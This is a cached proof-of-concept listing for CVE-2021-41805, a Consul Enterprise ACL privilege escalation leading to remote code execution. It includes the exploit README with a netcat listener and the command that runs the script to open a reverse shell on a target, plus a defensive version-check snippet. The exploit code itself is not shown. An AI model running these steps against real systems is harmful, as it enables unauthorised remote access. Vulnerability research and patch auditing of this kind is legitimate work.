PoC details: e5578d88836796a02dbc2a0e093346110c1f9243

Source
Related vulnerability
Title: Hashicorp HashiCorp Consul security vulnerability (CVE-2021-41805)
Description: Hashicorp HashiCorp Consul is a distributed, highly available, datacenter-aware solution from the US company HashiCorp. The product is used to connect and configure applications across dynamic, distributed infrastructure. HashiCorp Consul Enterprise contains a security vulnerability that an attacker can exploit to escalate privileges. The following products and versions are affected: HashiCorp Consul Enterprise before 1.8.17, 1.9.x before 1.9.11, and 1.10.x before 1.10.4.
Description
A proof-of-concept for CVE-2021-41805, a vulnerability in HashiCorp Consul Enterprise that allows Remote Code Execution (RCE).
Introduction
# CVE-2021-41805 - HashiCorp Consul Enterprise RCE

> [!WARNING]
> LEGAL DISCLAIMER:
> This tool is STRICTLY for EDUCATIONAL PURPOSES ONLY!
> Usage of this tool for attacking targets without prior mutual consent is ILLEGAL.
> It is the user's responsibility to obey all laws that apply whilst using this tool.
> The developer of this tool assumes no liability and is not responsible for any misuse
> or damage caused by this program.

## About the CVE
An **ACL token** (with the default **operator:write** permissions) in one namespace can be used for unintended privilege escalation in a different namespace. This can be abused to gain **Remote Code Execution (RCE)** with escalated privileges.

## Affected Versions
- < 1.8.17
- 1.9.x < 1.9.11
- 1.10.x < 1.10.4
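To turn the version list above into something an operator can run during an audit, the following added example (not part of this repository) parses the first line of `consul version` output and reports whether the installed build falls inside the affected ranges listed on this page. It assumes the version line has the shape `Consul v1.9.10+ent`, with `+ent` marking an Enterprise build; that format is an assumption made here, and the sample strings are constructed.

```python
import re

# Affected ranges as listed on this page (Enterprise builds only):
# anything before 1.8.17, 1.9.x before 1.9.11 and 1.10.x before 1.10.4.
# Map of (major, minor) -> first fixed patch level in that minor line.
FIRST_FIXED_PATCH = {(1, 8): 17, (1, 9): 11, (1, 10): 4}

# Assumed format of the first line printed by `consul version`, e.g.
# "Consul v1.9.10+ent"; "+ent" is taken to identify an Enterprise build.
VERSION_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)(\+ent)?")


def parse_version(text):
    """Return (major, minor, patch, is_enterprise) from a version banner."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError("no Consul version string found in: %r" % text)
    major, minor, patch = (int(x) for x in m.groups()[:3])
    return major, minor, patch, m.group(4) is not None


def is_affected(version):
    """True if this Enterprise build is inside an affected range."""
    major, minor, patch, enterprise = version
    if not enterprise:
        # The CVE is specific to Consul Enterprise; OSS builds are out of scope.
        return False
    if (major, minor, patch) < (1, 8, 17):
        return True  # every release before 1.8.17 is listed as affected
    fixed = FIRST_FIXED_PATCH.get((major, minor))
    # 1.9.x / 1.10.x are affected below their fix; later minors are not listed
    return fixed is not None and patch < fixed


def assess(banner):
    """Convenience wrapper: human-readable verdict for one version banner."""
    version = parse_version(banner)
    label = "%d.%d.%d%s" % (version[0], version[1], version[2],
                            "+ent" if version[3] else "")
    return {"version": label,
            "affected": is_affected(version),
            "enterprise": version[3]}


if __name__ == "__main__":
    # Constructed sample banners, not captured from a real host.
    for banner in ("Consul v1.9.10+ent", "Consul v1.10.4+ent",
                   "Consul v1.7.2+ent", "Consul v1.9.10", "Consul v1.11.0+ent"):
        print(assess(banner))
```

Feed it the output of `consul version` from each server and agent; a build reported as affected should be upgraded to 1.8.17, 1.9.11 or 1.10.4 (or later), and until then the blast radius of `operator:write` tokens should be reviewed per namespace.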

## Installing and Running the Script
- First, clone the repository:\
`git clone https://github.com/acfirthh/CVE-2021-41805.git`
- Change directory into the cloned repository:\
`cd CVE-2021-41805`
- Start a simple listener:\
`nc -nvlp <LISTENER_PORT>`
- Run the script:\
`python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPTIONAL: -t <ACL token> -v (verbose) -s (use SSL)]`

![Reverse Shell](images/reverse_shell.png)

## Expected Output
Running the exploit with the basic arguments: **-r [TARGET_IP]**, **-rp [TARGET_PORT]**, **-l [LISTENER_IP]**, **-lp [LISTENER_PORT]** (**-t [ACL_TOKEN]**, **-s [Use SSL]**) will give basic output like:\
```
[*] The PUT request was made successfully. Check your listener...
```

Running the exploit with the basic arguments plus **-v [VERBOSE]** will give verbose output:\
![Verbose Output](images/verbose_output.png)

If an error occurs when the exploit is run and the **-v** argument is specified, the output will be something like:\
![Verbose Output with Error](images/verbose_output_error.png)
File snapshot

```
[4.0K] /data/pocs/e5578d88836796a02dbc2a0e093346110c1f9243
├── [2.8K] CVE-2021-41805.py
├── [4.0K] images
│   ├── [ 14K] reverse_shell.png
│   ├── [ 50K] verbose_output_error.png
│   └── [ 32K] verbose_output.png
├── [ 34K] LICENSE
└── [1.8K] README.md

1 directory, 6 files
```
The Shenlong bot has cached this for you.
Notes
    1. We recommend accessing the PoC via the source link first.
    2. If the source has gone offline or cannot be reached, send an email to f.jinxu#gmail.com (replace # with @) to request a local snapshot.
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for local PoCs. Thank you for your support.